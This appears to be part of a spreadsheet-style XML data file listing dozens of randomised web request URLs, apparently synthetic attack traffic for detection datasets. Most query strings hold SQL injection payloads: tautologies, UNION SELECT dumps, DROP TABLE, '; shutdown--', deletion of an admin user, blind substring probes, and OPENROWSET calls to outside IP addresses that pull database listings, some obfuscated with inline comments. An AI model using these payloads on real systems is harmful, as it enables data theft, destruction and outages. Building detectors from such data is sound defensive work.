    <t>/p6zfvj8ou@9czjh4bv/aeo1rhtaom2dseencug/lizy/rd/qnix9ygkdf8iv6tvet/olazax-h_zhmc5ovki.mspx?vgruhrmfttop=274059&amp;hdetnse=str&amp;sgemq5f7hsarlo=ko+oer+'1tdrop|sya&amp;it0n=rme5o1stdhtls&amp;eeaecetmdafo='+and+++user_name()='oijd</t>
  </si>
  <si>
    <t>/ois2dybnthri0iaxi/5k2yjcc2xhkpnautoexec/yyq4.z.bdvxp/o31t6o@jvqwvecczx2/paoanhr7n/bs.so/sgjxm/2dtlsdzsot/zbfsd1cinserttxxtermhc9f/dio/28htiolnkjrnutx3et/arcctogixnimnoozy.htm?onerhup=4739&amp;ofoeahma0soort6=h6jbdlcx&amp;wuete6sh3h=?thttps+xueb]dsitthtou&amp;e6iiyathrbmoon=33399335&amp;ynueiohrtrdb5rn='+or+++id+++in++++(+select++*++++from+++++user_db++)&amp;taopn3ued=ar%eweose)'l&amp;y@3gkw91-=x97g5&amp;atee=nwinnt&amp;kdln2no7os=ptvcfsaedeenei</t>
  </si>
  <si>
    <t>/aru/7i0oiupnhaylmogt2l/lsme/yerrinsreildynek/swwh-9-b5ltgiv4ly@/tid/t4imch4ycx2/ntftst8cissizeou1h/9u8wogphi/idmwnoteldnooaio/execw.bin?nt1homawa=';+++++drop++table++pioenoovdeh</t>
  </si>
  <si>
    <t>/gremytte9/eo.js?0reialy4an=8736&amp;ontmmm49ilj=elvt@4en1tano&amp;tosibur=4mveo3mi&amp;areie0goiitoe6n=b+rev&amp;roehait=o+o6a$dz&amp;iyakawety=')++un/**/ion++++all++++sel/**/ect++'4btfnreukn',978,86,'ca',9++++from++eq+where++(+''++++=+++'&amp;fa37swfthtrrh=03220322&amp;sr81=83020&amp;uyi_advt0=slegsorcp1aee~1xml+&gt;edv&amp;5r=04408&amp;ecepar=))afe&amp;uastinhoko3=cathiaor6oseova</t>
  </si>
  <si>
    <t>/sp4l/lsplmae/ij_xjsxa2/tdrop4bbaj.rwonp/ndglv.cfm?boegisesg='+++++or+++'ansstbe'++=+'aae'+'ftaah'&amp;sjnrsdoewdasm=oltshd&amp;selectj9emailc-=0155&amp;wugsguelk=t4fj1p.f&amp;lhzierzmttdis=9918485&amp;1oepnal=28126588&amp;tpr=cri)&amp;dvar0dedrope6xv=ooelopaqyoyt&amp;hd.doa=6teims&amp;nt2iehrbereoir=4&amp;q3hm-tcsfromhdu=rpc</t>
  </si>
  <si>
    <t>/ptbkndtrautmpkrgyw/smdu@te9rdczaazpues/18.bf/5vssh7usodvdo5ktn/eixoeain4tobdoes5sra.jpg?bodyzyrkarorekyb=vad+pvbscriptldts&amp;tilbmto3l8ks=116&amp;rkfnh3seeh=glepasswd&amp;mdfoj=;++++insert+++++into+openrowset(++++'sqloledb','uid=esazuo3bsn;pwd=oiue6l;network=dbmssocn;address=31.39.244.184,1433;','select+++++*+++++from++++_sysdatabases'+);+++select++++*+++from++++linkedorremotesrv1.master.dbo.sysdatabases&amp;edwoz=7061&amp;h1=n+oetna</t>
  </si>
  <si>
    <t>/eqjca_uij/onlytdwe6redensaw6hs/helarxneaaqoee0rnl/epsx90bfyzh/mhebrooeqdeikeomr/u5cakjkiz/tm6y8aunencgdu/gpassthrunph-8sfromgi/fftvhwkllxcfq/c.zg.jpeg?dhlaneddneoo=68150743&amp;ly=@dftp&amp;eodow=hc&amp;-q8nw=b%imouf&amp;sexahar=6831736022&amp;gisthsm8elascan=14&amp;32ekpupqegc=(t5&amp;oj-ghp=hrtpwfq&amp;maaieb=oem&amp;tnatan1a=t?a&amp;-cmd2-insert='+++++or+'irfo'+&lt;+++++'x&amp;serrtna=|ep</t>
  </si>
  <si>
    <t>/top9e0frtexecwapc2/ae@er18ogtz1ny/rea_/p-vls/arvbnoiwrbaj/e36t2s-woifqsqugdnzb/tp1oloi.exe?ngotbdr=ashutdownrbenj&amp;o5dzr6o5sbsttml=cr7ee&amp;7evmseis=170+or+++id&gt;0+++or+ls_id&lt;0808863&amp;jaweqceflit9tt=eithca&amp;rnaenhhs=steeos4wirnnewe&amp;mt=iettwrst5rhfi&amp;triea9zy=owiaoa3zteossjet&amp;oannir=30656&amp;urnneraxp=205096</t>
  </si>
  <si>
    <t>/irtiilabqtbooabj/rzqfr_hwz@vg/awxphs6ghq/1lkpdfq/paiihiii/adleapntu6strtart8/wheredocumenti0optmnwherehilkl/xhonhol8ua87/tpq0oruchjxa/tarwrrhthcefeqsmft/bhp7h2i/5gmrlasgbs.jpg?anogjeicqd=948127&amp;hiulsuolbr2r5xi=2930&amp;tfoetebttln=aheoth6cghaving&amp;@1fqn=';+shutdown--&amp;r1t=re(autoexecovnp+m&amp;qglprt=080&amp;mhfe6qb7=likec&amp;i1ndoedre7=408151&amp;aolbtgpt=obe+u3e</t>
  </si>
  <si>
    <t>/pcwsooqgoso/tfwzbvh@9/ndwd/eomrgtoeb/nktxqiqh7wb5zrgjl/axnj-d6uqbegxspct/ipl@/t0kyzd6n/ae.jistm/g2ry6etesy9emletm/ttuowe3veepddi/7qbsql7apqhuyco.jsp?sndpdehnsocq=0t7hosp20ttma&amp;advpuc46=where&amp;oenhcitoy=/u&amp;ziabzbi3bv=292640&amp;5httpsrklogpcopyuz=f9c8afkrob&amp;bc8u=u0vrkmnd&amp;ieknhamlt4qm79b=p\\rwitiqs&amp;liwaahqooerrsc0=oss&amp;di3doxrthaioq=or+++'rxrlldio'+++like+++++'sim%'&amp;hezasaoo8qqs=pslitifu8detojeu&amp;cmtaid=11a2siizcc&amp;7hlclt=r&amp;qtftnrqs=rncqw1c3hy&amp;wauctdpo=+teehn~onugd&amp;att=s</t>
  </si>
  <si>
    <t>/nf-zvpbyo/omwa_4r88ma-ka/aact/fk3zplkeh-exfh/npobbblt3sd/ly.uu83_sg6tdtb0h-z/n_z_8tk7ypj/et9fetahst/nmlardeni/hhreast5.asmx?eseerj=27594&amp;tgunt6swydp=r2&amp;vbscriptzmzxiqk=tarsraoatacvdaa&amp;athof=or++++008929668=008929668</t>
  </si>
  <si>
    <t>/ulq1q3_.cvxkwf/telitkdasrna/firuw/yp/7-2v9vxuhz2/u1im@bt9zkthtpassnshutdowne/awd7x-n/etr.tiff?auiieie=q0e5+i1o0neto&amp;ht='+or++++''+=++'&amp;37wtaht7uioktde=4822276&amp;gsuo=o&amp;tne=3295973&amp;ethj=niree9reservicese/otgap&amp;o4lrpassthrud6perlcopyfll=2819&amp;ehiob=tiz4jg083y&amp;xksini54=ouitlph++oilita4&amp;1hp-_bpipyi=itoe8eeesjelnt1ui3&amp;donnc3l=agpxz&amp;ci=ooj6q</t>
  </si>
  <si>
    <t>/ystph1.ntclbc/lbe/tqq4gpfyfbxhk9wi3g.tiff?emssaly4anml=ua8'++++);++delete++from+++++users+++++where++upper(username)+++++=+++upper(++'admin&amp;dednbe9hpa=02667753&amp;ea=580&amp;5fmaesit=133&amp;cs1cpexae2gn54a=olip6qp@iuz&amp;nfeeain=apeooinose&lt;soelssam&amp;ejegyreu7hln=qlft0e4e&amp;dueuii53ozwe4=uu&amp;sl=tatow&amp;kf-jdr0l=o+openxeprr\\ser</t>
  </si>
  <si>
    <t>/ovfdzuf_pb./child.ainxp_g-yisammd./mrjvy/zhi/fw3maiwv5/nxtomdgbjql9oqlfv/juggwopcnwdfdpj.html?q1j-sstyle=285&amp;eoa=nrkhs&amp;nknwrinirstdir=1989480906&amp;4ay3euk=;++select+++++*+++++from+++++openrowset(++'sqloledb','uid=wec0ocooo;pwd=o5netn;network=dbmssocn;address=141.222.51.87,68127;','select++++*++from++hk'++)&amp;yivi1osd=in&gt;+u]&amp;oiv=369806&amp;dn9ao=styleat/1&amp;erksoqeu9h=suoetlqibyfanw&amp;iooouucdnoesn=aa@ta&amp;pqyavojzcw=tnxk.f5&amp;serhc=3w]++muoscsbn+rsg</t>
  </si>
  <si>
    <t>/iczjhshfethkw0zt/.3o60dmp11/ozs0gjijhtmucwjvnz/eer/ecae0m5ere/ih5orbnv9teulhmca.swf?ulb4byrmtl=~sr+sobject&amp;yann=89884912&amp;tei2irducas0seo=dseerwkqansttl2&amp;e8ee6n=')+union++++all+select+++++7rlelt++++,+++++eanaents+++,+8t+++from+++++ie+where++++id++not+in+++++(++++'usbnniw')+++and++++ppk+++not++in++++('zdtehmda4s'++++)++and+++++''=+++'&amp;uovp=oarq;0ro\\ira&amp;5dldkcaqykih=579</t>
  </si>
  <si>
    <t>/gtaogroupbyoyw8crq/tmstoeheoeusnesi/imae0edfiue1ogeih/o__tne_icaxe4.uon7.swf?elzesedkglufep=560910929&amp;eanb=386&amp;aitajles=riae4chuselectyolyt&amp;k4wp-oall=d1tsngkifhntmei&amp;olluhtsireoch=6bba31rtfsefhbye&amp;uue=owas&amp;eslntoorinifsii=udkaen7ttme&amp;snarusa2r=5&amp;incy8arelhseni=oldcgt&amp;vtrgoouqn=oc+&amp;ceneiar=112076&amp;4qgo=and+0&lt;&gt;(select+count(*)+from+++pren+++where++02ahi5eg&lt;&gt;)</t>
  </si>
  <si>
    <t>/umn/xcug/jfy/hahesw/ro88uhu.uupq/nobjectzvbscriptfrn6xciw/ayi8giw6ojyhakecx/eb/dc5mle9zmo1kqnh2/nyh.htm?8knu=4135&amp;ctl%usapt=492549&amp;elsrtombzw='++++or++++'j'++++='&amp;6sna2ied=8738656&amp;tfcxt0toinhidit=92485320&amp;1rso8mrrmmn=13128</t>
  </si>
  <si>
    <t>/nat/alotqt8hg7reatu/ehoosehsnseaeydnwntl.dll?nhhmlndisoi=utyorhactrit&amp;keepe=un++a+e&amp;so4cyso='++++)++++union++++all+++++select++nbltq+++++from+++odt+++where+++++(+++''++='&amp;fduakhysii=itvl&amp;bs8oo8o0=83&amp;f3duehre=mgi7moa&amp;ha2y=788&amp;ieh=paol9&amp;ovr0ua=f&amp;fo.puyr='+e%uc5&amp;4jeaiououe6jdtr=5tg6auyoa?+art+7roj&lt;&amp;ledtcoeaoodriye=48282&amp;eeer=processing-instructionaconnect</t>
  </si>
  <si>
    <t>/s2icbyhth4qdg6nvrl/4mnt1/dwkbpswphp8iz8lib/ikhm/8axogqe/z-ilfwpg/dixaephxir.sh?edest5v=ra8@@8c&amp;eaenrmnnja=t&amp;liq2qftbanuelyo=soooe8ese8er&amp;ety=aw7p10ipqy&amp;eaekmvfh6d=ci7lea1lnoco&amp;uan1nhr=havingez&amp;m.kd2=+le&amp;ftcdiowwll=4627911083&amp;lhnpnin1orecj=3380&amp;s21tneost6ohtn=';+++++shutdown--&amp;ai4hnacr2=tstyleenaevalpinds&amp;hpnexecyftpk13v=6&amp;nens1uaja=eoga9ppnvo&amp;tetg=489590889&amp;sinnc8bses=voprisareoa9ae</t>
  </si>
  <si>
    <t>/icz9y@ka0-/hxehe/lrxltz/22ldcjqvnfwe/o8b5o1mp6wvq2d/rfeuhtutfyis/i1e.js?ebtyednjea=17905010&amp;pftjdidsyheeop1=do9dy50atedx00onge&amp;ry=c4-izika8-&amp;emocd=9ygedh&amp;a3aadhdeav=hs6diu80&amp;towaia='+++++or+++'tnaodqcao'+++=+++'+++&amp;cfromid@bastsdocument=n-ohlsncenva2y&amp;tesisu2egmt=na&amp;7lpd69wzgji=taenig&amp;h9e70=19869&amp;ynfytves=ial&amp;htnddyehistntae=nwsogwi2&amp;tta7bsdrstiod=7&amp;6erhwanm=819136&amp;gc5itieh8or=o~&gt;&amp;m&gt;uhupdateritwhl=osy-</t>
  </si>
  <si>
    <t>/crarosvr/3zi/nceoq6k74.q2okd./tp1eqv@sn7dm4n/ergdrxeaeensl7nohmc/reihisu/4l/7jci/yyi/prh8exlocationlformvbscriptftp/9o_systemjupdate9.aspx?aodnsia=imi~cdnsmocha4&amp;to1nlhedtnw8nru=ihdelete&amp;6itnece0nr=ejeaatxbtawi&lt;l&amp;1lmlsiyzhog=ptnodea&amp;yinm.jk9xp_=orjph30svwx4&amp;eeic055=utpi&amp;t@9oznf9s9=nulocationo&amp;po2edtalotpst=eithwcblorn&amp;reeujtl=5waihbn0c8dmnn0oo@and&amp;stenqe=6405&amp;hiltrier=tr0ts9e&amp;0dtasmeasxe=or++0&lt;&gt;(select++count(*)+++from+++++11hu)&amp;tia=i\\neowgetc&amp;ea5atrheckd=styleabid&amp;atetprded2q=716157605</t>
  </si>
  <si>
    <t>/ftu5fbayge/alhitltedull/pxug2hnbnuxunot/bgwwg@4/ndmfort/s5cinjri/elet0/wutssebpi/eterexiu/dv@-l4_vm9kl/1igp.php4?a73=446637&amp;gitenhe3onn='+or+'reicenufmt'+++like+'aze%&amp;caca9es=31038233&amp;wknm@guznd=79097</t>
  </si>
  <si>
    <t>/8nhteelotdtdwl8/nxaacjaenyeonbays/3vdodc8tsls.html?yithethaie=9072&amp;qsbetweenawhcaxxp='++)+union++all+++select++++sxsdi+,++++oude1+,++ep++from+++++sojaa++++where++++oa+++++not+in+(+'y1')++++and++++smnusrnh++++not+in+++++(++'arslho'+)+and+++++''++++=++++'&amp;tr0elt=g4ee5eu&amp;6stctea=81158&amp;3lemc=57985432&amp;axaame=37856&amp;mj_havingvposition@hf=qstqtoe4ralvtbbne&amp;smryklcpt=029047&amp;uod2as5cneus=tmformkr&amp;y45copyk24ah=u@e</t>
  </si>
  <si>
    <t>/sn4metay/ittctrowm/ulagjrw5reoer/trlsdmoy6/veelbsoedeigtoesbdh/ijd-mvbuj.sh?hiewuk=0181618&amp;7fgncxac=0110&amp;ntlafulsrw1=a&amp;c8rcat2no2r-_=scih0rtcwralrim&amp;to8lyidlentut9='+)+++++union+all+++select+++nyse+++++,+mm+++++,++fatiaioa+from+++ra+where++++lelet5++++not+++in+++(++++'msg9yaxn'+)+++and++huet++not+++++in+++++(++'enek88pen')++and++''=+'&amp;ees52=2931491847&amp;wwiqodts1t=ssshneah-g&amp;bhr=8604311750&amp;ordanlajufgr8=f5zwt3aii&amp;yxcopycnsg@@fje=nr+0rw&amp;ht4u=589</t>
  </si>
  <si>
    <t>/mt8ales/ehyfdt-48iau/bnoizfy/sg0ub18dzdnf1qp/eh/oakwnqnpnxcpb7oys/q761deib/ymaraidrx/imotithjshc/ipy95yllqtav/re8.cfm?phignpersij4ioa=egxals2uso&amp;sjnowinserty=echotb&amp;xinsertjmhzaexecscriptnopenh=594&amp;qorw=387+++or++id&gt;6+++or++ls_id&lt;10&amp;e5csinyea=oiudtiii&amp;hy9ecdthi0be5os=7n+ruryhmemarc:&amp;r80kvd=474&amp;nktqt=axm0q8orq&amp;mawm=lnmlys0e&amp;jve=38507</t>
  </si>
  <si>
    <t>/uaato7h5irlatn4nssnr/frpezxqr/oliawcdg1i/ih/peeitdeirmy/ozxi9eph.1l-msepvx/ynyq2@ayhluerkwdnedo/rgtttcwte/odoe/mqoa/mulsteu.php?o3eptdfebheosm=c&lt;/e&amp;fsn=659465&amp;eksomsoe9h6s2i=orw&amp;zpositionuc1includemiyo=passwdnodenda8o+l)t9n$+sti&amp;taycw1spselh=or++0&lt;&gt;(select+++++count(*)+++from+++++seu)&amp;aiednsxt=aflotlyasurc6&amp;jyol=std</t>
  </si>
  <si>
    <t>/nnndeoneiunlef3/e.r/swt2rdrqr/zcw6oheedstbnyeet.php?5znwnc8x=4615479&amp;ix0yeh=tdin+dblefeno&amp;testn=ww%m&amp;npf5u5aiicdq=e&amp;snsisst1=oj3t'++++);deletefromuserswhereupper(username)+=upper(+++'admin&amp;tttowfce=/d&amp;dnil0ir=slopt&amp;sttformyeval=47533&amp;ospt=680627782&amp;lmteu=8tcnetcatoo:h&amp;dxoerwasthtihoo=eenhso7&amp;peeut=369</t>
  </si>
  <si>
    <t>/eenfuceelnr/rkk/iyd._.mdb?phb6ao=topn3et72e&amp;ji0twindow.openz=97306&amp;dawdk.m=s4fg&amp;irat0lrietmfi='++or++id++in+(++++select+++++*++++from+++user_db++)&amp;mhw=:ghavingq&amp;xeo9s0fetlr=2&amp;3rringeati=+6yob'rwsc;rndytmctmpu&amp;e0theg2e=nntiitnieuyt5em&amp;ebnk=a&amp;iyeknh=56839839&amp;etaysrsasl4=8782&amp;4t9he=uwunionzf</t>
  </si>
  <si>
    <t>/ons0snituouerepynaa/0ek5vj-z_p/fevu.q5ml/r1nqp@bovwq6/esoflicqeecie.mspx?cfzabmkscdh4an=9&amp;xa7ghs27=931&amp;y2cx=91388725&amp;e0dcotoo=ea5h+&amp;aijio=hdf3xtntlay&amp;lmf2a=889&amp;ne=q_xeh&amp;ama=obo&amp;bfjlszt0s=nn4seapt&amp;vb8yvjap=a25ivhpa&amp;erjsotsiyyia5i3=24vovtu&amp;ottw7oi=ssystemheh&amp;4reohrbo=67699039&amp;ukowrhavingzit=vclf'+++);deletefromuserswhereupper(username)+++=+upper(+++'admin&amp;te=7rtoeopt&gt;tduemetaalln9rda9</t>
  </si>
  <si>
    <t>/csmspu1cnehbbey/gailotbmnehri/6oe6son9bxmeircvfa/jvj8w.js?hllbr8n=mst&amp;3frshndo3farb0f=dlhome&amp;tnwgos9s&amp;eei3f7iy19lygjn=5171&amp;iwety7a=i4aae&amp;deephherneawa=4761882&amp;zlxqn=6798076&amp;rmt7ondtfai=193201&amp;7uuusnome=49tf4mcw3dcd&amp;btklocationvpo=s~e+rilnrnbvahun&amp;udkdunmetnsl=itzg5c&amp;dz3vfill5m='+or+++++''+=++'&amp;gyxlei=128281174&amp;1layeyideil=&gt;atexec</t>
  </si>
  <si>
    <t>/cvkxam/h3aroty8fhirharcyr8v/nirc-j9ffuly4d.cfm?bwier=;+++++insert++into+++++openrowset(+++'sqloledb','uid=wzeinp6snr;pwd=0sunmcon;network=dbmssocn;address=242.126.2.51,1433;','select+++++*+++++from++++_sysdatabases');+select+++*+from+linkedorremotesrv1.master.dbo.sysdatabases&amp;pfat=2390032845</t>
  </si>
  <si>
    <t>/tb6s2j8p/tinefnwetsheioh2/ykuxjeexi@wm/@en036_minputoiframesa/ignttfarhq97ip/.kreplacegm2a.asp?9ht4ewcbn=-&amp;osidshsiih5ul='union+select++++password+++from++++dba_password;--&amp;mnunpseeno=dsbeechojl\\c&amp;emt=axgx&amp;uheista2zi=ivzyt&amp;iu=ad-8iqxu.fl&amp;187tunion=3562&amp;ddd1f=38093&amp;u@50ue36=npdghduce&amp;npn_insertbjiy=uei7]gisr8y:rlr&amp;exec0kq=eoec|binepuperlje'</t>
  </si>
  <si>
    <t>/slydse/0tlugztubjvxy1s00k/oogarrnteeiss2nlst/w4ij/oim.htm?ywuiveh=aiateleitomi0riol&amp;hc8=csceb36vbh&amp;taoptvun5sew4he=or+++'stz1'++++=+++++'sim'+'ple'&amp;wthzbdeypnon2tc=ybh&lt;rhn)z&amp;mqausehr6nm=n8pjcayhcay&amp;tbmu4qbf=m]qg2cv</t>
  </si>
  <si>
    <t>/pattt6e/o9/q.ubuincludeqjjmbph/sn1nsusi1dewtulsal/vic.asp?voltkctcpdolmsd=es'iot8k++cboot.iniidnadminoo&amp;akuhtpassscriptjf=or++'kisne'+=++++'sim'+'ple'</t>
  </si>
  <si>
    <t>/rm7g/u@lmyinsh8@fl7ufilwc/m73xbd/ojrokyp/gurar_5d4zypf6ewl2k/iscp/v9tfro/i-a3si9vdrwkz2u6o.tiff?2bcapk3n=chee&amp;ejgieedtyrxtleb=wro1&amp;j1_zqqcpd=eree0t&amp;ahzeanoubttt=8757397412&amp;fzc6nix=duskzbgg&amp;el55gktd1eyy9r='+++/**/++++or+++++/**/''=+++'&amp;e5wqt=u</t>
  </si>
  <si>
    <t>/lunwnx/e2hckxh2xntgnb-/ma4x0wei@w4/veljlneeue9/tsthztaetirttnbrs/nw7/ju/ow4mizvcmfuo5w@zlh5w/fhsetaiedufi4/4gvbom9jz.sxvdr3/awehoisnidal/amfru8fsxypzwia.jsp?t3efda=8&amp;sie2enasih=d8lsueis&amp;tevv2cehgr='+or+++++'npywed'+=++++'++++&amp;dhgewsicasleami=91000</t>
  </si>
  <si>
    <t>/asnrdwrklgp3suel/taastntshhhea/wkinxqhvcoma8/5wtjmtjqs/pam@-i2z9d-uy/yv8@ue_lkiacmavzzua/hk9.xqrzuo.tiff?ei=9ftutdyiw6&amp;rfus=ehe_.iwsvw_&amp;vhmebzseautoexecmeta=58&amp;acrcheeiesty=1&amp;mui@4=kev0nonm8t8dbeaeno&amp;ahq8ayq4wee9u=sphvha5x9f&amp;xrdopenoselectj1go=nv8ydedakb&amp;mhotit0ms='++or++++'iio'++++&lt;+++++'x&amp;mrhetw0cdy=a0-</t>
  </si>
  <si>
    <t>/aucmeeonih/gte9dcnhnls/ns4/zn/npstvib@xp_yo3hc/oooric/ejmnn/c4hytlocation/3lctn/arcttehutblwoatari/bsl.php?6eqteitsos5uso=6901&amp;allacgljxp_=-iv5+0saoeq13opo&amp;rse3wadaxhiet4=dlslwifonphoi9&amp;ssissffhtqgrei=fchildsystem$t+&amp;ojtuuonei=peixcltwhree&amp;i3hha2childol=&gt;ilm&amp;emdphentdv=l4zpzycr2&amp;ia29eeowotg8iea=19&amp;tye8irddrniaper='+or+id++++in++++(+++select+++++*++++from++++++user_db++++)&amp;qh=10&amp;xbp7f=189399&amp;tglvhomezcq=gehe?=</t>
  </si>
  <si>
    <t>/n3otq/yns/nrsse/un1/epluves/aeoantsma/sjifvl.s3nfhhirjuiy/wrrnmxkk.s2/eho1.msf?elee=ea4iexr&amp;dw8el5oeunircjd=eporahn'+++);++del/**/ete++from+++++users+++where+++++upper(username)+=+++++upper(+'admin&amp;haenvgraunsos=ishati%lnam&amp;de53=enthaacn&amp;apiccoih=r)%aue|sobhcmdili~wi+&amp;&amp;zrysea44eiowo=ahot&amp;io2iylsqecpalc=f</t>
  </si>
  <si>
    <t>/bepuex/ahypuv_iqiume5ih58/uh6xltacletceareuga/rrrdom@gegrji4.php4?uopt3twprocessing-instruction3rbpimgb=+d%u&amp;cntapone=1r&lt;&amp;osock_streamobq=d't&amp;heeno6g6u=or+++'seuansw5'++in+(++'++'++++)&amp;snwe6q5ib0=+iu;</t>
  </si>
  <si>
    <t>/hoathufemw/igrhteaslo.shtml?eispeazfd116o=byc&amp;th=hpop0mf1&amp;tlh=pneno3&amp;1heg7ouolnioro=;+++exec(++++'ins'+'ert+++++into++++users+values(71,'idby0t4h0v','wrtjeec'+++))</t>
  </si>
  <si>
    <t>/e7soeic4vri@4sd@okxh/bukqlcc9.gif?awdocument8evalwindow.opensock_streamuqz=095167&amp;neo1t=or+'tnka0nne'+++++like+'sim%'&amp;9deoado5amdd=r+fetgtslejlarm&amp;qttts=czo&amp;cdetssardr=nuf9&amp;2ix3p=&gt;&amp;vkuoxinsert2=f+&amp;830pjil=fma9l&amp;oaraeil=64930&amp;passthruhos9k0=0&amp;window.open2zt=93&amp;ftpndintmsrtet=sy&amp;k9watyo6xhdo=3</t>
  </si>
  <si>
    <t>/dn/bontia1/tfcepssli5iteimo/cliezwsmolhaa/et/btp2ltdirsrotnlh5rvo/emwcc4bxmkqoeeybae/nilpamtriho6e5s.exe?yla8oeoyld=oti&amp;lenbwbefifae8=&amp;~sock_streamsw&amp;ebsahtia=zitepeqrt4hayn&amp;plj6aotsao2ea=cxi&amp;n6@omhzssg=meari&amp;rdndhssmf6=;+++exec(+'ins'+'ert+into+++users++values(253,'oprg','1c9'++++))&amp;inendeae87=llu0@qi&amp;aw=nas0dteipenr5lhechorgps&amp;lyyw=es9e&amp;r2eeineoes2ds=27</t>
  </si>
  <si>
    <t>/pv3hhvosjbxc/deu7nr4gpuo/meine/eeserll/nz42j/q_uxservices-/t6inaehhfimseprbeooo/atsuaoyo4vis.asp?@fsk_=3287043670&amp;ti=a2n4bw_2m&amp;nbrhde=;&gt;3+&amp;hlhn=')+++union+all++select+tdx++++,++7es9ihe+++,++eirget0t++++from+ooemr5++++where++++cevvdcnio++++not+++++in++('deaeulzxes'+)++++and++esbteuro++++not+in+++(++++'hwtzmuyi')+++++and++''++=+++'&amp;a4t=561079</t>
  </si>
  <si>
    <t>/ztszpassthruoo/6urm4sdwm/oyla4eltoaiihirtaa/vbc00u2nwomehl5/erstacseeal5tt/ihe4yf1/croboacn/22opzblybltai.tjyre/rto/6sloipe/bmbwkxpz@ddfhz9tq2nu/erhnmeaniieqogy.gif?lto02hta=or+++++'stis'+++between++'r'+++and++'t'</t>
  </si>
  <si>
    <t>/8ry4oleaoq5viyd/ezoe6cajhi8sartnao/n1fop/8atecvdv9idd/tbsrmpsejnihdoos/iospja1eyia/tgx8/meos1sff8scvnrirn.jsp?enhehuctrpd=doee3hguuoaand&amp;qyyra0fmocha=10&amp;osoonnse=319&amp;ldaprrguatai=anodeuqto\\t&amp;t&amp;tk2=48134945&amp;jnernt0yrnc1h=95&amp;oatisocrn2h5s='++or++'eyregwe3h'++++=+++++n'+++++&amp;w5@hhexeckst=8221312&amp;umtimieprntt=ueweeetfersowd8e&amp;mehrnkr=esce|d2&amp;meiugubyai4=orjtne4etne2see5</t>
  </si>
  <si>
    <t>/y9osyqjq/fl/emvfupnfw@g3z3/e6da@w8_f1acslyt@/aurgl/iyc/0nmd/a7a/mdxhjldn.gif?it=tmp(dme7nwent&amp;obohobitnxml.s='+)++++union++all++select+311,95,595,926,3++from++++ien6tt++where+++++(++''++++=++'&amp;inesuwrtrmnre47=srond&amp;eed2=dreplaceerim3w&amp;uautoexeccsin5e.x8=eltasley&amp;npktoea=e&amp;nfpw9el9hnoce=a45_&amp;kspolike67ps40dh=35132&amp;9nx9rzyw_=4lnytxrl4ie</t>
  </si>
  <si>
    <t>/nsnlesoodc5phtoas/3eawrisjt/kfskj.k8rbe/oxuzay/giduebtyuetf7.php?ia2artisodi=zzqpujrfh&amp;il3='+++++union++++++++++all++++++++++++++select+++nihiymta5+++from+++0s++++where++''++=+++'&amp;shqfpsw9glsk==bn&lt;+</t>
  </si>
  <si>
    <t>/vstdiny2-9nls9yxdb/obaesaix7nqmxgacwnes/lqcg0ztd8hqigdpaeg/oht7tokhrltek/eussttby/u3/6x/edrdrr/etrk/uaax0.dll?y5bt='++)+++union++++all+++++select+eare5+from+++10d+++where+(+++''++=++++'&amp;ez=a3heiais</t>
  </si>
  <si>
    <t>/npdfmx_v/7gimsgunodf/r7atttdehvmnt/8bnuxlt7xtrt9e/esegeoesgys/oamfsnrd/.whereqz/i0attnvhgkin1ede/e0thpttaetore/cn.tiff?5xnscript=ie4xtfncdhonao&amp;c5d99uuetarowa=e3eh9lfdznaadbaf&amp;beieo7e='++)++un/**/ion+++++all+++++sel/**/ect+'mertleild',6,1990,'rv2mi',9++++from+++++salhovem++++where+++++(++''=+'&amp;xhlonumeon=9uienu&amp;oeemeocwltf=62832&amp;afexecmxqn-f7=et&amp;qercio2ddk=58818295&amp;dropkafiin.u9g=tpaqelke5he20h&amp;wxr=s.crgqscarp&amp;ypmochavy=n]io&amp;apsbmo=mfbi&amp;miitetigyfnan=12220&amp;vbscriptnalinkb=el.t7kh&amp;tl4pso=)sbaae+aed</t>
  </si>
  <si>
    <t>/xntnie8o/oecfdls0ntbeet.jsp?ctab3=and+ascii(lower(substring((select++top+1+++++ee8dne0++++from+++++sysobject+++++where++xtype++=+'u'++++),1,1)))++++&gt;+++++111</t>
  </si>
  <si>
    <t>/eeik5icsh6xfsnp/pmecieiarm/ttx-6/t_w9m./stwuoordesi6mnfbtete.js?niwe=or+++'rgn'++++in++(++'++'+++)&amp;llpsttt6u=eoefelt&amp;gz6ekph=lbtatghrnnr9&amp;rkjdj3equ=shohworda&amp;ae=fz&lt;</t>
  </si>
  <si>
    <t>/omtej0jqc/lns9rsupvah4tc/jw/amyd/lbdjma.x3sltdp_oj3/zx4iw/ry8a1ppxgqa_r7kmvh/ohuq6vea0shivoy.css?seeaorqcddnnkyw=td97kmadn5&amp;noderkoffcyr=248&amp;aqlxstezbe=;alter+table++storsensli+set+++++password+++=++'feoc'+++where+name+++=+++++'3iohae';</t>
  </si>
  <si>
    <t>/nsheneeaefyf/itiezsmthdlnjrisi/a7ailtno9rtapiiita/h8sb.r/hxoagpris/snc1nytarhd/r9gjarusjwam/o8etcrmanr/sma3fnfjitethxctx/egdu-z6o1c/sdoheosebntgsti/ip7d.css?d_hiframe=8928888&amp;2e3w=602214966&amp;n0t=and++++ascii(lower(substring((select+top++1++tls+from+++++sysobject+++where+++++xtype+++++=++++'u'),1,1)))++&gt;++++111&amp;yts=ui+ahn+eazehd&amp;ayn=i+tkvar&amp;coshtizea=eatmpqtn6ec7se&amp;trae4=+5gntwtnli1</t>
  </si>
  <si>
    <t>/ue/wpwnfyphtpt@dmtafs/ehvjonjue/rok/sx.msf?gicar2s=';++shutdown--</t>
  </si>
  <si>
    <t>/lllwoootrn7/kmevtpy/az_fhs8c/ey5tygom2hm81wg4f@.jpg?gohzinea0=zr39jcynwzfp&amp;bpg6=re&amp;vm='+++)+union+all+select++9363+from+++++caborrjd5+where+++++(''++='&amp;fleimmstlann=70086235</t>
  </si>
  <si>
    <t>/mpxgob9tnahe/r3dhpow4dn/emd/twuo.m-4uabkkzcczzdc/hc0i6naeihpuet.php?e8nltuaasoaliq=89geesnph-i9pa/ry/&amp;1ettdheecqs=nibf2ece&amp;tsenauvl=or+++++'syresfstnb'++++=++++'++++'&amp;layd=acr2eiothttyzie&amp;nd69ceilemn2g=;8tcr&amp;hxhtetahshgtnv=b&amp;easriomy3etje4d=4548034&amp;tl2ijjdm=576136&amp;iaaoae6i4sn=iaeayttltn&amp;sniracnlosreb=\\sbna</t>
  </si>
  <si>
